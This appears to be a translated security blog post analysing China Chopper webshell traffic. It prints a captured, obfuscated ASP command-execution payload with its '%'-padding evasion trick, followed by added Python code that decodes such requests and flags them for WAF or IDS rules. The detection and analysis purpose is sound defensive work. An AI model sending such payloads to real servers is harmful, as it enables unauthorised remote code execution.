Before going any further, I need to cover how webshell liveness ("alive") checking works.
For this I did quite a bit of homework: I captured and analyzed the traffic of two versions of Caidao (China Chopper) and of three webshell liveness-check tools on the market.
I found that one of the Caidao builds contains a backdoor, and all three liveness-check tools contain backdoors.
First I tried capturing the traffic of a webshell liveness check (as shown in the figure):
The result was: @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("-6??Р????
The rest is garbled? Looks impressive, but I can't make sense of it.
So the liveness check works by executing the corresponding code on the shell and then matching the expected string in the response.
Next, the data captured from Caidao:
ASP site
POST
cmd=%u0045%xec%ute%G%loba%l%%28Replace%28%22Fu%nct%ion%20bd%28by%V%al%20s%29:Fo%r%20i%%3D1%20T%o%20Le%n%28s%29%20S%te%p%202:c%%3DM%id%28s%2Ci%2C2%29:If%20Is%Nu%meric%28M%id%28s%2Ci%2C1%29%29%20T%hen:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%29:E%lse:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%4026%40M%id%28s%2Ci%2B2%2C2%29%29:i%%3Di%2B2:E%nd%20If:Ne%xt:E%nd%20Fu%nct%ion:E%xecu%te%%28bd%%28%22%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%22%22%29%%29%22%2C%22%4026%40%22%2Cchr%2838%29%29%29'
After URL decoding:
E%xec%ute%G%loba%l%(Replace("Fu%nct%ion bd(by%V%al s):Fo%r i%=1 T%o Le%n(s) S%te%p 2:c%=M%id(s,i,2):If Is%Nu%meric(M%id(s,i,1)) T%hen:bd%=bd@26@c%hr(""@26@H""@26@c):E%lse:bd%=bd@26@c%hr(""@26@H""@26@c@26@M%id(s,i+2,2)):i%=i+2:E%nd If:Ne%xt:E%nd Fu%nct%ion:E%xecu%te%(bd%(""4F6E204572726F7220526573756D65204E6578743A526573706F6E73652E577269
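The decoded line above still shows "E%xec%ute%G%loba%l%(" because a standard URL decoder leaves a "%" alone when it is not followed by two hex digits. The client relies on the server-side form decoder being more lenient, which is why a keyword signature for "ExecuteGlobal" applied after ordinary decoding never fires. The following is an added example (not code from the original post, and not Caidao's own) that normalizes a request body the way a permissive decoder would, undoes the "@26@" -> "&" substitution the payload asks Replace() to perform, re-implements the bd() hex decoder from the captured VBScript in Python, and flags the pattern for detection. It assumes that the server decoder drops stray "%" signs and understands "%uXXXX"; the hex tail in the sample body is constructed (it only writes "ok") and stands in for the real one, while the obfuscated prefix is copied from the capture above.

```python
import re
import urllib.parse

HEXDIGITS = set("0123456789abcdefABCDEF")

# Constructed sample request body. The obfuscated prefix is the one captured above;
# the hex tail is our own second stage (it just writes "ok"), not the real payload.
STAGE2_SOURCE = 'On Error Resume Next:Response.Write("ok")'
CONSTRUCTED_HEX = STAGE2_SOURCE.encode("ascii").hex().upper()
SAMPLE_BODY = (
    "cmd=%u0045%xec%ute%G%loba%l%%28Replace%28%22Fu%nct%ion%20bd%28by%V%al%20s%29"
    ":Fo%r%20i%%3D1%20T%o%20Le%n%28s%29%20S%te%p%202:c%%3DM%id%28s%2Ci%2C2%29"
    ":If%20Is%Nu%meric%28M%id%28s%2Ci%2C1%29%29%20T%hen"
    ":bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%29"
    ":E%lse:bd%%3Dbd%4026%40c%hr%28%22%22%4026%40H%22%22%4026%40c%4026%40M%id%28s%2Ci%2B2%2C2%29%29"
    ":i%%3Di%2B2:E%nd%20If:Ne%xt:E%nd%20Fu%nct%ion:E%xecu%te%%28bd%%28%22%22"
    + CONSTRUCTED_HEX +
    "%22%22%29%%29%22%2C%22%4026%40%22%2Cchr%2838%29%29%29"
)


def naive_unquote(body: str) -> str:
    """Standard decoding: stray '%' signs survive, so 'E%xec%ute' stays split."""
    return urllib.parse.unquote(body)


def lenient_unquote(s: str) -> str:
    """Decode like a permissive form decoder (assumption about the ASP side):
    %XX and %uXXXX are decoded, '+' becomes a space, any other '%' is dropped."""
    out, i, n = [], 0, len(s)
    while i < n:
        ch = s[i]
        if ch == "+":
            out.append(" ")
            i += 1
        elif ch != "%":
            out.append(ch)
            i += 1
        elif s[i + 1:i + 2] in ("u", "U") and len(s[i + 2:i + 6]) == 4 \
                and all(c in HEXDIGITS for c in s[i + 2:i + 6]):
            out.append(chr(int(s[i + 2:i + 6], 16)))
            i += 6
        elif len(s[i + 1:i + 3]) == 2 and all(c in HEXDIGITS for c in s[i + 1:i + 3]):
            out.append(chr(int(s[i + 1:i + 3], 16)))
            i += 3
        else:
            i += 1  # '%' that forms no escape: dropped (the padding trick relies on this)
    return "".join(out)


def decode_bd(hexstr: str) -> str:
    """Python port of the bd() function in the decoded VBScript: two hex digits per
    character, except that a pair starting with a letter marks a four-digit code
    (the original uses this for double-byte characters)."""
    out, i = [], 0
    while i < len(hexstr):
        pair = hexstr[i:i + 2]
        if pair[0].isdigit():
            out.append(chr(int(pair, 16)))
        else:
            out.append(chr(int(hexstr[i:i + 4], 16)))
            i += 2
        i += 2
    return "".join(out)


def normalize_chopper_body(body: str):
    """Return (normalized first stage, decoded second stage or None)."""
    _, _, value = body.partition("=")          # strip the 'cmd=' parameter name
    stage1 = lenient_unquote(value)
    # The payload asks the server to Replace("@26@", chr(38)); we apply it to the
    # whole text for simplicity, which is enough for matching.
    stage1 = stage1.replace("@26@", "&")
    m = re.search(r'bd\(""([0-9A-Fa-f]+)""\)', stage1)
    stage2 = decode_bd(m.group(1)) if m else None
    return stage1, stage2


CHOPPER_ASP_MARKERS = ("ExecuteGlobal(Replace(", "Function bd(byVal s)", "chr(38)")


def is_chopper_asp(body: str) -> bool:
    """Detection: all markers present after lenient normalization."""
    stage1, _ = normalize_chopper_body(body)
    return all(marker in stage1 for marker in CHOPPER_ASP_MARKERS)


if __name__ == "__main__":
    s1, s2 = normalize_chopper_body(SAMPLE_BODY)
    print("flagged:", is_chopper_asp(SAMPLE_BODY))
    print("stage 1:", s1)
    print("stage 2:", s2)
```

The point for anyone writing a WAF rule or an IDS signature from this capture: decode the body the way the target interpreter's form parser does before matching, otherwise the inserted "%" characters split every keyword you are looking for.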